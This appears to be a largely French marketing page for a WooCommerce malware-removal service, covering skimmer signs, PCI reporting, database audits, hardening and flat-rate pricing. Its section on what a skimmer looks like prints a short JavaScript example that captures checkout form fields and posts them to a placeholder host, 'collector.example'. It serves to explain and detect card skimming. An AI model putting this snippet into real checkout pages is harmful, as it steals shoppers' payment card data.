Comment savoir si ma boutique WooCommerce a un skimmer ?

Common signals: customers report fraud after buying from you, your acquirer or bank flags suspicious chargebacks, browser dev-tools show an external JavaScript loaded on the checkout that you don't recognise, or a third-party scanner reports 'Magecart-style' injection. If any of these is true, treat the store as compromised until proven otherwise.

Gérez-vous les implications PCI ?

I produce a written incident report that documents what was found, when it was introduced, and what was removed. That report is the form your acquirer or QSA will expect. I am not a QSA and do not perform PCI audits — but my report is the technical record that supports one.

La boutique restera-t-elle en ligne pendant le nettoyage ?

Quand c'est sûr, oui. Si nous trouvons une injection active de skimming de cartes, la page de paiement doit être retirée ou le JavaScript bloqué en bordure jusqu'à la fin du nettoyage — cela protège les nouveaux clients. Nous le recommanderons dans la note de triage avant toute modification destructive.

WooCommerce est-il plus difficile à nettoyer que WordPress seul ?

En grande partie identique — WooCommerce est un plugin par-dessus WordPress — mais la surface est plus large : plus de JavaScript sur la page de paiement, plus de données de commande dans la base et une pile de plugins plus lourde. L'approche de nettoyage est identique : revue manuelle des fichiers et de la base, identification du vecteur, durcissement.

// WOOCOMMERCE · SKIMMER · BACKDOOR · NETTOYAGE

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

Démarrer un nettoyage → Exemples de ce que nous cherchons.

§ 01 — CE QUI EST FAIT

Les deux côtés du fil.

[ CÔTÉ CLIENT ]
Skimmers de cartes, surcouches de formulaires de paiement, redirections conditionnelles, cryptojackers. JavaScript sur le checkout audité ligne par ligne.
[ SERVICES ]
Web shells, backdoors, payloads RCE de plugins, utilisateurs admin injectés. Supprimés en lisant les diffs de fichiers et les diffs de base de données, pas par pattern-matching.
[ AUDIT DB ]
wp_options pour les payloads autoloadés, wp_posts pour le spam, wp_usermeta pour les privilèges dormants, tables wp_woocommerce_* pour les altérations.
[ TRIAGE DES PLUGINS ]
Plugins actifs comparés aux CVE publiés. Plugins vulnérables patchés ou remplacés — pas simplement désactivés.
[ DURCISSEMENT ]
wp-config, permissions, rotation des secrets, XML-RPC, REST API et réduction de la surface de login.
[ RAPPORT ]
Rapport forensique en clair : ce qui a été trouvé, quand cela a été introduit, ce qui a été supprimé. Remettez-le à un acquéreur, un assureur ou votre QSA.

§ 02 — À QUOI RESSEMBLE UN SKIMMER

Script externe sur le checkout. C'est généralement tout.

Un skimmer WooCommerce est souvent une simple inclusion JavaScript sur la page de checkout qui envoie les champs du formulaire du client vers un hôte distant avant que WooCommerce ne soumette la commande. Le script est minuscule, l'appel réseau ressemble à un ping d'analytics tiers, et le client ne voit rien d'anormal.

// FORME GÉNÉRALE D'UN SKIMMER DE CHECKOUT

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Les vrais skimmers obfusquent la destination et ne se déclenchent que lorsque le total du panier est non nul — mais la structure est la même. Auditez chaque JS sur le checkout, pas seulement ceux que vous vous souvenez d'avoir installés.

§ TARIFS

Forfait $279. Une seule fois. Par site.

[ RESCUE ]

$279

FORFAIT · UNIQUE · PAR SITE

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage →

[ SHIELD ]

$29 / mo

PAR SITE · RÉSILIATION À TOUT MOMENT

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contact →